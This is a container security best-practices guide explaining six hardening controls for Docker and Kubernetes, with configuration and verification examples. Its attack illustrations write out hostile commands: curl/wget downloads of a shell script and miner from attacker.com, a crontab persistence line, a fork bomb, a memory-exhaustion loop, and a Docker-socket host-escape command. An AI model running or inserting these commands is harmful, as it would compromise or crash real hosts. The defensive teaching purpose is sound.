How To Secure Your Containers? 6 Practical Security Best Practices You Don't Want To Miss

Feb 23, 2026

A single misconfigured container gave attackers root access to an entire Kubernetes cluster in the Tesla breach. The attack path was shockingly simple:

Found publicly exposed Kubernetes dashboard (no authentication)
Deployed privileged container
Mounted host filesystem
Gained root on all cluster nodes
Installed crypto-mining software across 100+ EC2 instances

If you’re building your container security strategy and don’t know where to start, this guide covers the 6 critical controls (in priority order) that help prevent container escapes and host compromise.

Critical Controls

Run containers as non-root
Drop unnecessary capabilities

High Priority

Make containers read-only (immutable)
Limit resources (prevent DoS)

Important

Secure Docker socket access
Enable comprehensive logging

Let’s dive in.

1. Run Containers as Non-Root Users

Containers run as root by default. This creates a dangerous privilege escalation:

Non-root user on host → Starts container → Container runs as root

Without user namespace remapping enabled, root inside the container is the same UID 0 as root on the host.
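One way to check whether this applies to a given container is to read /proc/self/uid_map from inside it. The snippet below is a minimal Python sketch rather than part of the original setup: the function name is hypothetical, and it assumes the standard three-column uid_map format (first ID inside the namespace, first ID outside it, length of the range) in the common non-nested case.

```python
def container_root_is_host_root(uid_map_text: str) -> bool:
    """Return True if UID 0 inside the namespace maps to UID 0 outside it.

    Each uid_map line holds three integers: first ID inside the namespace,
    first ID outside the namespace, and the length of the mapped range.
    """
    for line in uid_map_text.strip().splitlines():
        inside, outside, length = (int(field) for field in line.split())
        # Does this range cover UID 0 inside the namespace?
        if inside <= 0 < inside + length:
            # UID 0 inside corresponds to (outside - inside) on the outside.
            return outside - inside == 0
    # No range maps UID 0 at all.
    return False


# Identity mapping, typical when user namespace remapping is off.
print(container_root_is_host_root("0 0 4294967295"))
# Remapped: container root is an unprivileged UID on the host.
print(container_root_is_host_root("0 100000 65536"))
```

The text passed in would come from something like `docker exec <container-id> cat /proc/self/uid_map`.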

If an attacker escapes a container that is running as root, they have full root access to the host machine, which means:

Access to all files on the host
Lateral movement across the network
Ability to read secrets from other containers
Ability to deploy additional malicious containers

Real-World Attack Example

Docker Hub Cryptojacking (2019):

1. Attacker deployed malicious image to Docker Hub
2. Image ran as root by default
3. Container escaped via kernel exploit
4. Gained root on host
5. Deployed cryptominers across entire infrastructure

Cost: Thousands in unauthorized AWS charges before detection

So, What’s the Solution?

Option 1: Set Non-Root User in Dockerfile (Recommended)

FROM nginx:alpine

# Create non-root user
RUN addgroup -g 1000 appuser && adduser -D -u 1000 -G appuser appuser

# Install tools BEFORE switching user (still root here)
RUN apk add --no-cache libcap curl wget

# Change nginx to listen on 8080: find and replace port 80 in the nginx config file.
RUN sed -i 's/listen\s*80;/listen 8080;/g' /etc/nginx/conf.d/default.conf && \
    sed -i 's/listen\s*\[::\]:80;/listen [::]:8080;/g' /etc/nginx/conf.d/default.conf

# Change ownership of necessary directories
RUN chown -R appuser:appuser /var/cache/nginx && \
    chown -R appuser:appuser /var/log/nginx && \
    chown -R appuser:appuser /etc/nginx/conf.d && \
# root owns nginx.pid by default. Create it so ownership can be handed to appuser
    touch /run/nginx.pid && \
    chown -R appuser:appuser /run

# Switch to non-root user
USER appuser

# Use port > 1024 (non-root can't bind to ports < 1024)
EXPOSE 8080

Why this is better: Baked into the image, works everywhere, can't be overridden accidentally.

Option 2: Specify User at Runtime

# Docker
docker run --user 1000:1000 -p 8080:8080 myapp:latest

# Docker Compose
services:
  web:
    image: myapp:latest
    user: "1000:1000"

# Kubernetes
apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    runAsGroup: 1000
  containers:
  - name: app
    image: myapp:latest

Verify It's Working

# Check which user the container is running as
docker exec <container-id> whoami
# Expected output: appuser (NOT root)

# Or check process owner
docker exec <container-id> ps aux
# Expected: Processes owned by appuser (UID 1000)

# Kubernetes verification
kubectl exec <pod-name> -- whoami
# Expected output: appuser
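To audit many containers at once, the same check can be scripted against the Config.User field that `docker inspect` reports. The following is a minimal Python sketch under stated assumptions: the function name is hypothetical, and it only looks at the configured user string, so a custom username that happens to map to UID 0 would not be caught.

```python
def runs_as_root(config_user: str) -> bool:
    """Interpret the Config.User value reported by `docker inspect`.

    An empty value means no USER was set, so the container defaults to
    root. "root" or UID 0 (optionally followed by ":group") is also root.
    """
    user = config_user.strip().split(":", 1)[0]
    return user in ("", "0", "root")


# Values as printed by: docker inspect --format '{{.Config.User}}' <container-id>
for value in ("", "root", "0:0", "appuser", "1000:1000"):
    print(repr(value), runs_as_root(value))
```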

2. Drop Unnecessary Capability Privileges

Linux has over 30 capabilities that determine what privileged operations a process can perform.

By default, Docker grants containers 14 capabilities—far more than most applications need.

Common capabilities

Granted by Docker by default:

CAP_NET_BIND_SERVICE - Bind to ports below 1024.
CAP_NET_RAW - Use RAW & PACKET sockets (for ping, traceroute).
CAP_CHOWN - Change file ownership.
CAP_DAC_OVERRIDE - Bypass file permission checks.
CAP_FOWNER - Bypass permission checks on operations that normally require file ownership.
CAP_SETUID / CAP_SETGID - Change user/group IDs.
CAP_SYS_CHROOT - Use chroot().

Not granted by default, but often added via --cap-add or --privileged:

CAP_SYS_ADMIN - Mount filesystems, many admin ops.
CAP_SYS_MODULE - Load/unload kernel modules.
CAP_SYS_PTRACE - Trace/debug processes.

Each unnecessary capability is an attack vector.

If an attacker gains code execution in your container, these capabilities determine what they can do next.

Real Attack Scenario

Capability Abuse Chain:

1. Attacker exploits RCE vulnerability in web app
2. Container has CAP_SYS_ADMIN (not needed for the app)
3. Attacker uses this capability to mount host filesystem
4. Reads /etc/shadow from host
5. Cracks passwords, gains SSH access to host
6. Full infrastructure compromise

Audit Your Current Capabilities

# Check what capabilities a container gets by default (no --privileged, which would grant everything)
docker run --rm -it alpine sh -c 'apk add -U libcap; capsh --print | grep Current'

# Output example:
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,
cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,
cap_mknod,cap_audit_write,cap_setfcap=eip

That’s 14 capabilities. Does your app need all of them?

The Solution: Drop All, Add Only What’s Needed

# Drop all capabilities, add only NET_BIND_SERVICE (if needed)
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE myapp:latest

Docker Compose

services:
  web:
    image: myapp:latest
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE  # Only if binding to port < 1024

Kubernetes

apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  containers:
  - name: app
    image: myapp:latest
    securityContext:
      capabilities:
        drop:
          - ALL
        add:
          - NET_BIND_SERVICE  # Only if needed

Verify it’s working

# Check container's actual capabilities
docker inspect <container-id> | jq '.[0].HostConfig.CapDrop'
# Expected: ["ALL"]

docker inspect <container-id> | jq '.[0].HostConfig.CapAdd'
# Expected: ["NET_BIND_SERVICE"] or null

# Verify at runtime (no package install needed, so it also works as non-root)
docker exec <container-id> grep Cap /proc/1/status
# CapBnd should be 0000000000000400 (NET_BIND_SERVICE only) or all zeros
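The kernel exposes each process's capability sets as hexadecimal bitmasks in /proc/<pid>/status (the CapEff and CapBnd fields), which are hard to read by eye. As a rough illustration, the Python sketch below decodes such a mask into names. The function name is hypothetical; the bit numbers follow linux/capability.h, and bits beyond the last entry in the table are ignored.

```python
# Capability names indexed by bit number, as defined in linux/capability.h.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_capabilities(hex_mask: str) -> list[str]:
    """Turn a hex mask such as a CapBnd value into capability names."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]


# Mask for a container started with --cap-drop=ALL --cap-add=NET_BIND_SERVICE
print(decode_capabilities("0000000000000400"))
# Mask corresponding to Docker's 14 default capabilities
print(len(decode_capabilities("00000000a80425fb")))
```

Seeing CAP_SYS_ADMIN or CAP_SYS_MODULE in the decoded list for an ordinary web application is a strong hint that the container is over-privileged.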

3. Make Containers Immutable (Read-Only Filesystem)

By default, containers have read-write access to their entire filesystem. This allows attackers to:

Download additional tools (curl, wget, netcat)
Install backdoors and persistence mechanisms
Modify application code
Write malicious scripts
Create new files for data exfiltration

This is a failure of drift prevention: the container ends up running executables that weren’t present when the image was scanned.

Real Attack Example: Container Drift Attack

1. Attacker exploits RCE in web application
2. Downloads reverse shell: curl attacker.com/shell.sh > /tmp/shell.sh
3. Installs crypto miner: wget attacker.com/miner && chmod +x miner
4. Modifies application code: echo "backdoor" >> /app/server.py
5. Creates persistence: echo "*/5 * * * * /tmp/shell.sh" > /etc/crontab

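If the root filesystem were read-only, steps 3-5 would fail outright, and step 2 could only write to a tmpfs mount such as /tmp, where noexec blocks direct execution.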

The Solution: Enable Read-Only Filesystem

Docker

docker run \
  --name myapp \
  --read-only \
  --user 1000:1000 \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --tmpfs /tmp:rw,noexec,nosuid,size=100m,uid=1000,gid=1000 \
  --tmpfs /var/run:rw,noexec,nosuid,size=50m,uid=1000,gid=1000 \
  --tmpfs /var/cache/nginx:rw,size=100m,uid=1000,gid=1000 \
  -p 8080:8080 \
  myapp:latest

Why tmpfs? Applications often need to write temporary files. tmpfs creates a temporary, in-memory filesystem that:

Allows writes (needed for temp files)
Prevents execution (noexec flag)
Gets wiped on container restart
Never touches the host disk

Note: tmpfs always overrides Dockerfile permissions at runtime.

Dockerfile chown  →  sets ownership in the IMAGE
--tmpfs mount     →  creates a BRAND NEW empty filesystem at runtime
                     and mounts it OVER the image directory
                     wiping out any ownership you set in Dockerfile

So the sequence at runtime is:
1. Container starts
2. Image layers loaded (your chown is here ✓)
3. --tmpfs mounts fresh empty filesystem OVER /var/cache/nginx  ← overwrites chown!
4. New tmpfs is owned by root by default, hence uid and gid required at runtime.
5. With uid/gid set, the tmpfs is owned by appuser, so nginx (running as appuser) can write to it

Verify It’s Working

# 1. Check read-only status
docker inspect <container-id> | jq '.[0].HostConfig.ReadonlyRootfs'
# Expected: true

# 2. Try to write a file (should fail)
docker exec <container-id> touch /test.txt
# Expected: "Read-only file system" error

# 3. Verify tmpfs mounts exist and work
docker exec <container-id> df -h | grep tmpfs
# Expected: Shows /tmp, /var/run mounted as tmpfs

docker exec <container-id> touch /tmp/test.txt
# Expected: Success (tmpfs is writable)

# 4. Try to execute from tmpfs (should fail due to noexec)
docker exec <container-id> sh -c 'echo "#!/bin/sh" > /tmp/test.sh && chmod +x /tmp/test.sh && /tmp/test.sh'
# Expected: "Permission denied" (noexec prevents execution)
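The manual checks above can also be run against the HostConfig section of `docker inspect` output. The following Python sketch is illustrative only: the function name and the wording of the findings are hypothetical, and it assumes HostConfig carries the ReadonlyRootfs flag and a Tmpfs map of mount path to option string.

```python
def tmpfs_findings(host_config: dict) -> list[str]:
    """List read-only/tmpfs hardening gaps found in a HostConfig dict."""
    findings = []
    if not host_config.get("ReadonlyRootfs", False):
        findings.append("root filesystem is writable")
    # Tmpfs maps each mount path to its comma-separated option string.
    for path, options in (host_config.get("Tmpfs") or {}).items():
        flags = set(options.split(","))
        for required in ("noexec", "nosuid"):
            if required not in flags:
                findings.append(f"{path}: tmpfs mounted without {required}")
    return findings


# Sample mirroring the docker run command in this section.
sample = {
    "ReadonlyRootfs": True,
    "Tmpfs": {
        "/tmp": "rw,noexec,nosuid,size=100m,uid=1000,gid=1000",
        "/var/cache/nginx": "rw,size=100m,uid=1000,gid=1000",
    },
}
for finding in tmpfs_findings(sample):
    print(finding)
```

On the sample, the only findings concern /var/cache/nginx, which the command above mounts without noexec or nosuid.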

Deploy Golden Image Containers (GCI)

What are Golden Images? Pre-built hardened base images with all required software already installed.

Benefits:

No package installation at runtime (prevents drift)
Faster container startup (no apt-get/yum during boot)
Consistent versions across all containers
Scan once, deploy everywhere.

4. Limit Resource Usage (Prevent DoS)

By default, containers have unlimited access to host resources:

CPU
Memory
Disk I/O
Process count

A single compromised container can:

Consume 100% CPU (starve other containers)
Exhaust all memory (crash the host)
Fork-bomb with unlimited processes (DoS)
Fill disk with logs (crash the host)

Real Attack Example: Resource Exhaustion

# Attacker gains access to container without resource limits
# Launches fork bomb:
:(){ :|:& };:

# Or memory exhaustion:
x="x"  # Start non-empty, otherwise doubling an empty string never grows
while true; do
  x="$x$x"  # Doubles memory usage each iteration
done

# Result:
# - Host runs out of memory
# - Kernel OOM killer starts killing processes
# - Other containers crash
# - Host becomes unresponsive
# - Manual reboot required

Blast radius: Entire host and all containers.

The Solution: Control Groups (cgroups)

What are cgroups?
Control Groups limit the resources (CPU, memory, I/O, PIDs) that a group of processes can use.

Docker: Limit CPU and Memory

docker run \
  --memory="512m" \
  --memory-swap="512m" \
  --cpus="1.5" \
  --pids-limit=100 \
  --restart=on-failure:5 \
  myapp:latest

Reservations vs Limits

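reservations - Resources set aside for the container, a soft minimum (for example --memory-reservation in Docker, or deploy.resources.reservations in Compose)
limits - Hard maximum (cannot exceed)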

How to Determine Appropriate Limits

Step 1: Measure baseline usage

# Monitor container for 24 hours under normal load
docker stats <container-id>

# Output:
CONTAINER ID   NAME     CPU %    MEM USAGE / LIMIT     MEM %
abc123         myapp    45.5%    320MiB / 512MiB      62.5%

# Peak usage observed: 400MB memory, 1.2 CPU cores

Step 2: Set limits with 20-30% buffer

Observed peak: 400MB
Buffer: 400MB * 1.3 = 520MB
Limit: 512MB (rounded)

Observed peak: 1.2 CPU
Buffer: 1.2 * 1.25 = 1.5 CPU
Limit: 1.5 CPUs
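The arithmetic above is easy to script when many services need limits. Here is a small Python sketch of that calculation; the function names and the 64 MB rounding step are assumptions chosen for illustration, not values from any tool.

```python
def limit_with_buffer(observed_peak: float, buffer_percent: int) -> float:
    """Scale an observed peak by a safety buffer given in percent."""
    return observed_peak * (100 + buffer_percent) / 100


def round_to_multiple(value: float, step: int) -> int:
    """Round to the nearest multiple of step (e.g. 64 MB increments)."""
    return step * round(value / step)


memory_mb = limit_with_buffer(400, 30)   # 400 MB peak with a 30% buffer
cpus = limit_with_buffer(1.2, 25)        # 1.2 cores peak with a 25% buffer
print(memory_mb, round_to_multiple(memory_mb, 64), cpus)
```

Note that rounding 520 MB down to 512 MB shrinks the buffer to 28% of the observed peak, which is still inside the 20-30% range.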

Step 3: Test under load

# Load test the container
ab -n 10000 -c 100 http://localhost:8080/

# Monitor for OOM kills or CPU throttling
docker stats <container-id>
docker events --filter 'event=oom'

Step 4: Adjust based on results

If OOMKilled events occur → Increase memory limit
If CPU % constantly at 100% → Increase CPU limit
If no issues after 1 week → Limits are appropriate

Verify It’s Working

# 1. Check configured limits
docker inspect <container-id> | jq '.[0].HostConfig.Memory'
# Expected: 536870912 (512MB in bytes)

# 2. Test memory limit
docker exec <container-id> sh -c 'cat /dev/zero | head -c 600m | tail'
# Expected: Process killed (OOMKilled) before filling 600MB

# 3. Monitor real-time usage
docker stats <container-id>
# Verify usage stays under limits

# 4. Check for OOM kills in logs
docker events --filter 'event=oom' --since 1h
# Should show OOM events if limit was exceeded
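Because `docker inspect` reports the memory limit in bytes while the run flag takes a value such as 512m, a small converter helps when comparing the two in scripts. This is a minimal Python sketch with a hypothetical function name; it handles only whole numbers with an optional b, k, m or g suffix.

```python
# Suffix multipliers (binary units), matching how 512m becomes 536870912.
_UNITS = {"b": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}


def docker_memory_to_bytes(value: str) -> int:
    """Convert a --memory style value such as '512m' to bytes."""
    value = value.strip().lower()
    if value and value[-1] in _UNITS:
        return int(value[:-1]) * _UNITS[value[-1]]
    # No suffix: the value is already in bytes.
    return int(value)


configured = docker_memory_to_bytes("512m")
reported = 536870912  # HostConfig.Memory from docker inspect
print(configured == reported)
```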

5. Secure Docker Socket

What is Docker socket?

/var/run/docker.sock = the API endpoint used to control the Docker daemon (service)

The owner of this socket is root.

Giving a container access to the Docker socket is equivalent to giving it unrestricted root access to your host.

A compromised container can create, run, and delete any container on the host.

Real Attack Example

# Attacker gains access to a container with the Docker socket mounted
docker exec -it compromised-container bash

# Inside the container, the attacker uses the Docker API to start a new container
# that mounts the host filesystem (-v /:/host)
docker run -it --rm -v /:/host alpine chroot /host bash

# The new container runs as root (default)
# Attacker now has a root shell on the HOST, not just the container
# Can read /etc/shadow, SSH keys, cloud credentials, everything

The Solution:

1. Don’t Mount Socket At All

# Dangerous
docker run -v /var/run/docker.sock:/var/run/docker.sock myapp

# Safe - don't mount it at all
docker run myapp

If your application doesn’t absolutely need Docker API access, don’t give it any access to the socket.
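To find out which existing containers already have the socket mounted, the Mounts list in `docker inspect` output can be scanned. The Python sketch below is one way to do that; the function name is hypothetical, and it assumes each mount entry carries Source and Destination keys.

```python
# Host paths under which the Docker socket is commonly found.
SOCKET_PATHS = ("/var/run/docker.sock", "/run/docker.sock")


def socket_mounts(inspect_entry: dict) -> list[str]:
    """Return in-container paths where the host Docker socket is mounted."""
    hits = []
    for mount in inspect_entry.get("Mounts") or []:
        if mount.get("Source") in SOCKET_PATHS:
            hits.append(mount.get("Destination", ""))
    return hits


# One element of the JSON array printed by `docker inspect <container-id>`.
entry = {
    "Mounts": [
        {"Type": "bind", "Source": "/var/run/docker.sock",
         "Destination": "/var/run/docker.sock", "RW": True},
        {"Type": "bind", "Source": "/srv/data", "Destination": "/data", "RW": False},
    ]
}
print(socket_mounts(entry))
```

An empty list means no direct socket mount was found for that container.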

Most applications DON’T need Docker socket access. Common reasons people mount it (and alternatives):

To restart containers - Use Kubernetes liveness/readiness probes.
To deploy new containers - Use a CI/CD pipeline, not in-container deployments.
To get container metrics - Use Prometheus or cloud-native monitoring.
To manage Docker from a web UI - Use Portainer.

2. Use Podman instead: it's daemonless, so there's no root-owned daemon socket to expose.

3. Use a Socket Proxy, if mounting is absolutely necessary:

Instead of mounting the Docker socket directly, use a socket proxy that:

Filters which Docker API calls are allowed
Blocks dangerous operations (mounting volumes, privileged mode)
Logs all API requests
Enforces rate limiting

Examples of proxy solutions include:

Docker Socket Proxy from LinuxServer.io
Docker Socket Proxy from Tecnativa
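To make the filtering idea concrete, here is a minimal Python sketch of the allowlist decision such a proxy makes for each request. It is not the logic of either project listed above: the allowlist contents and function name are hypothetical, and a real proxy would also forward permitted requests to the socket and log every decision.

```python
import re

# Hypothetical allowlist: a few read-only Docker Engine API endpoints.
ALLOWED = [
    ("GET", re.compile(r"^/_ping$")),
    ("GET", re.compile(r"^/version$")),
    ("GET", re.compile(r"^/containers/json$")),
    ("GET", re.compile(r"^/containers/[^/]+/json$")),
]

# Requests may carry an API version prefix such as /v1.43.
_VERSION_PREFIX = re.compile(r"^/v\d+\.\d+(?=/)")


def is_allowed(method: str, path: str) -> bool:
    """Decide whether a request may be forwarded to the Docker socket."""
    path = path.split("?", 1)[0]           # ignore the query string
    path = _VERSION_PREFIX.sub("", path)   # ignore the version prefix
    return any(method.upper() == m and rx.match(path) for m, rx in ALLOWED)


print(is_allowed("GET", "/v1.43/containers/json?all=1"))
print(is_allowed("POST", "/v1.43/containers/create"))
```

Denying by default matters here: anything not explicitly listed, including container creation and exec, is rejected.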

6. Enable Comprehensive Logging

According to OWASP, breaches took an average of 191 days to detect in 2016. More recent data (IBM 2024) shows this has increased to 277 days.

Why? Many organisations fail to:

Log container events
Monitor for suspicious activity
Alert on security-relevant actions
Retain logs for forensic analysis

Without logging, attackers can operate undetected for months.

What Should You Log (Minimum)?

Container Lifecycle Events

# What to capture:
- Container start/stop/restart events
- Image used (name, tag, digest)
- User/service account that initiated the action
- Container configuration (ports, volumes, capabilities)
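Some of these fields can be pulled from the JSON that `docker events --format '{{json .}}'` emits. The Python sketch below shows one way to flatten an event into a log record; the function name and output keys are hypothetical. The event stream does not say which user initiated the action, so that field has to come from another source such as audit logs.

```python
import json


def summarize_event(json_line: str) -> dict:
    """Flatten one JSON line from `docker events` into a log record."""
    event = json.loads(json_line)
    actor = event.get("Actor", {})
    attributes = actor.get("Attributes", {})
    return {
        "time": event.get("time"),
        "type": event.get("Type"),
        "action": event.get("Action"),
        "container_id": actor.get("ID"),
        "image": attributes.get("image"),
        "name": attributes.get("name"),
    }


# Sample line with made-up values, shaped like a container start event.
line = (
    '{"Type":"container","Action":"start","time":1700000000,'
    '"Actor":{"ID":"abc123","Attributes":{"image":"myapp:latest","name":"myapp"}}}'
)
print(summarize_event(line))
```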

Access to Secrets and Sensitive Data, detects credential theft & lateral movement

# What to capture:
- Secret retrieval from secret stores
- Environment variable access
- Volume mounts to sensitive directories
- Failed authentication attempts

Privilege Escalation Attempts, detects attempts to get elevated privileges

# What to capture:
- Capability additions (especially CAP_SYS_ADMIN)
- Privileged mode usage (--privileged flag)
- UID/GID changes
- sudo/su usage inside containers
- Root process execution

Network Connections, detects C2 communication and data exfiltration

# What to capture:
- Inbound connections (source IP, port)
- Outbound connections (destination IP, port, domain)
- DNS queries (especially to unusual TLDs)
- Connection attempts from unexpected countries

Volume Mount Events, detects container escape attempts

# What to capture:
- Volume mount paths
- Mount permissions (rw vs ro)
- Sensitive mounts (/var/run/docker.sock, /etc, /proc)

Failed Operations, detects reconnaissance and attack attempts

# What to capture:
- Failed network connection attempts
- Failed file write/read attempts
- Failed permission changes
- Failed capability usage
- API authentication failures

Log Retention and Analysis

Retention Policy:

Security events - Cold storage for 1 year
Container lifecycle - Warm storage (S3 Standard) for 90 days
Application logs - Hot storage (Elasticsearch) for 30 days
Debug logs - Hot storage (Elasticsearch) for 7 days
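A policy like this is easiest to enforce when it lives in code or configuration rather than in a document. As a rough sketch, the Python below encodes the retention periods above as a lookup; the category keys and function name are hypothetical, and one year is taken as 365 days.

```python
# Retention periods in days, per log category (one year taken as 365 days).
RETENTION_DAYS = {
    "security": 365,
    "lifecycle": 90,
    "application": 30,
    "debug": 7,
}


def should_retain(category: str, age_days: int) -> bool:
    """Return True while a log entry is still inside its retention window."""
    return age_days <= RETENTION_DAYS[category]


print(should_retain("security", 200))
print(should_retain("debug", 8))
```

A cleanup job could call this per entry and delete or archive whatever falls outside its window.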

Your Path Forward - Implementation Roadmap

Critical Controls

Audit all containers for root user
Add USER directive to top 5 critical Dockerfiles
Rebuild and deploy with non-root user
Verify: docker exec <container> whoami returns non-root

High Priority Controls

Drop ALL capabilities, add back only needed ones
Add --read-only flag to all containers
Configure tmpfs for /tmp, /var/run
Set memory and CPU limits based on baseline usage
Verify containers still function correctly

Socket Security & Logging

Audit containers with Docker socket mounted
Deploy socket proxy for containers that need Docker API
Remove direct socket mounts
Set up centralized logging (Fluentd/CloudWatch/Splunk)
Configure Falco for runtime security monitoring
Create alerts for critical security events

Golden Images & Refinement

Create 3-5 golden base images
Migrate applications to golden images
Fine-tune resource limits based on production data
Review and tune Falco rules (reduce false positives)
Document all security controls and exceptions
Train team on new security practices

Final Thought

Many attacks could have been prevented if these 6 controls had been in place:

Resource limits → Mining activity would have been throttled.
Dropped capabilities → Attacker couldn’t escalate privileges.
Non-root user → Attacker couldn’t write to system directories.
Logging → Suspicious activity detected sooner.
Read-only filesystem → Attacker couldn’t download malware.
No Docker socket access → Attacker couldn’t deploy more containers.

Chat Soon,
Kushal

